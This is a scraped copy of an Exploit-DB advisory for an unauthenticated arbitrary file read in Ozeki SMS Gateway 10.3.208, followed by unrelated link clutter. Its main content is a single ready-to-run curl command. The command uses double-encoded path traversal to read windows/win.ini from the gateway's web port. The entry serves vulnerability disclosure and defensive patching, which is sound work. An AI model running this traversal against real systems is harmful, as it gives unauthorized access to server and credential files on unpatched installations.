[webapps] Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

1 year ago

source link: https://www.exploit-db.com/exploits/51646
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

EDB-ID:

51646

EDB Verified:

Platform:

Multiple

Date:

2023-08-04

Vulnerable App:

# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link:
https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10



##################################### Arbitrary File Read PoC
#####################################

curl
https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini

##################################### Arbitrary File Read PoC
#####################################

Copy

Recommend

[webapps] Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

EDB-ID:

51646

Platform:

Multiple

Date:

2023-08-04

Recommend

此次美股财报季，投资者不关心 AI 技术

目前市场上有哪些比较好的开源商城系统？

Discover Why Timing is The Most Crucial Factor for Success in Business (Episode...

Create a responsive card grid in Angular with CSS (2023 edition)

Creating a Blog using Hugo, Asciidoc, and Netlify

Citrix Written Test Questions-1

Key Strategies for Marketing Your Financial Products and Services

艾拉比完成B2轮融资，半年内已融资两轮

Triaging Videos by Adding Captions to Mplayer (Shallow Thoughts)

彻底摆脱英特尔，苹果已经是“芯片巨头”了

About Joyk